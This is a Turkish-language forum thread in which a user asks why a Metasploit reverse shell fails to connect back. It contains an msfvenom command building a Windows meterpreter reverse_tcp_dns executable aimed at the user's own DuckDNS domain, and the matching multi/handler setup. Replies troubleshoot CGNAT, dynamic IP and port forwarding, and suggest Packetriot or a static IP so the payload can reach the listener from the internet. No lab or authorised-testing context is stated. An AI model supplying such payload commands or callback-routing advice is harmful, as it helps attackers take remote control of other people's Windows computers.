Kali Linux'ta dinleme yapılmıyor

masad34

Picopat
Katılım
16 Ekim 2023
Mesajlar
211
Çözümler
3
Daha fazla  
Cinsiyet
Erkek
Arkadaşlar düne kadar her şey normaldi. Bugün Duckdns'den domain açtım ve modem arayüzünden güvenlik duvarınıda düşük yaptım. DMZ ve port ayarlarını yaptım ancak niyeyse dinlemeyi başlattığım dosya dinleniyor diye uyarı veriyor ama dinlemek için dosyayı Windows'a atıp çalıştırdığımda dinlemeye başlandı diye uyarı vermiyor. Aynı şekilde kalıyor. Ayrıntılar aşağıda.
msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=benim açtığım domain . duckdns .org LPORT=443 veya 4443 (ikiside dinleme yapmıyor) -f exe > /root/Desktop/deneme . exe
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp_dns
set lhost (benim local ip)
set lport (kullandığım port 443 veya 4443)
exploit
STARTED REVERSE TCP HANDLER
Burada dosyayı çalıştırıyorum ancak her şey aynı kalıyor. Değişen hiçbir şey olmuyor. Yardımcı olursanız sevinirim.
 
URL çubuğuna yanlış yazıyorsundur. http://xx.xx.xx.xx şeklinde dene veya dinamik ip olduğun için(?) ip adresin değişmiştir. duckdns paneline gidip ip adresini güncelle. Örneğin windows'ta duckdns uygulaması var her açılışta ip güncellemesi yapıyor. linuxta böyle bir uygulama var mı bilmiyorum.
 
URL çubuğuna yanlış yazıyorsundur. http://xx.xx.xx.xx şeklinde dene veya dinamik IP olduğun için(?) IP adresin değişmiştir. Duckdns paneline gidip IP adresini güncelle. Örneğin Windows'ta duckdns uygulaması var her açılışta IP güncellemesi yapıyor. Linux'ta böyle bir uygulama var mı bilmiyorum.

Hocam şimdi yaptım siteye ulaşılamıyor dedi. Ben lhost kısmının birine duckdns ile aldığım domaini yazıyorum diğerine local IP'yi yazıyorum. Linux'ta internet sitesinden kullanıyorum ve internet sitesinde public IP'm yazıyor ve yanında Update IP yazıyor. En son 4 saat önce değiştirildiğini söylüyor. Domaini 4 saat önce açtım zaten. Şimdi Update IP'ye basınca düzelecek mi?

Domaini oluşturduktan 15-20 dakika sonra dinlemeyi denemiştim ilk sefer yine olmamıştı.
 
Hocam public IP'nin ne zaman değişeceği hiç belli olmuyor. Modem arayüzünde WAN kısmındaki IP adresinle duckdns panelindeki adres aynı olması lazım. Hedef sistemle aynı ağdaysanız bir yerel IP adresinizle deneyin. 192.168.xx.xx. Ama benim önerim packetriot kullanmanız. Çok daha kolay ve sağlıklı bağlantı veriyor.
 
1713008316470.png
1713008330986.png


IP göremedim hocam ilk resimde bilgi kısmında ikinci satırda olan yer mi?
 
Hocam IP adresi 10 ile başlıyor ve yanılmıyorsam NAT adresi bu. Terminalden ping attım ona da yanıt vermedi. Yani bu durumda duckdns kullanamazsınız. Packetriot deneyin.
 
Herkes kullanıyor ama hocam benimkinde neden böyle?

Hocam attığım resimde WLAN cihazları kısmında IP'm 192.168.1.12 görünüyor. Ben terminalden ifconfig yazarak bakmıştım 192.168.1.11'di. Yazmam gereken yerlerede 1.11 yazdım. Modem arayüzünde DMZ ve port ile ilgili olan yerlerede bunu yazdım. Sanırım bu local IP. Acaba değiştide o yüzden mi olmuyor?
 
Son düzenleme:
Hocam herkes dediğiniz adam CGNAT değildir de ondan. İsterseniz 192.168.1.12 de deneyin ama bence asıl sorun Duckdns'in modeminize ulaşamaması. Ben de bir ara kullanıyordum sonra bir anda CGNAT yaptılar artık kullanamıyorum. Sizin gibi bir sürü 10 ile başlayan IP'li modemi tek public IP'den internete veriyorlar işte daha ucuza geliyor. Statik IP satın alarak da bu problemi çözebilirsiniz.
 

Geri
Yukarı